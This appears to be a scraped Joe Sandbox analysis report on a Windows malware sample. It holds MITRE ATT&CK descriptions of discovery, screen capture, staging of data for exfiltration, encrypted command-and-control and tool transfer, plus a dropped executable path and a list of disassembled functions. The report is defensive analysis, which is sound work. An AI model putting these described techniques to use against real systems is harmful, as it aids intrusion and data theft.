Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hBB2KnTndI

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hBB2KnTndI.exe_ad2fc02f1e967b8af8cf5fed27f1f4916534b2_362a01e9_181a7760\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER66C6.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6957.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B7B.tmp.xml

C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
hBB2KnTndI

Function 00411C06 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 353
memoryCOMMON

Function 004EEC21 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 467
threadinjectionmemoryCOMMON

Function 00401340 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 58
libraryloaderCOMMON

Function 00424F00 Relevance: 12.1, APIs: 8, Instructions: 64
fileCOMMON

Function 004011A5 Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Function 00424120 Relevance: 40.9, APIs: 22, Strings: 1, Instructions: 645
stringCOMMON

Function 00424B00 Relevance: 27.3, APIs: 18, Instructions: 272
COMMON

Function 0041B6A0 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 257
stringCOMMON

Function 0040C2A4 Relevance: 7.5, APIs: 3, Instructions: 3712
memoryCOMMON

Function 004249B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Function 004AB5F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 54
COMMON

Function 00424FD0 Relevance: 4.6, APIs: 3, Instructions: 53
fileCOMMON

Function 00425290 Relevance: 4.5, APIs: 3, Instructions: 21
COMMON

Function 00426FE0 Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Function 0042D470 Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON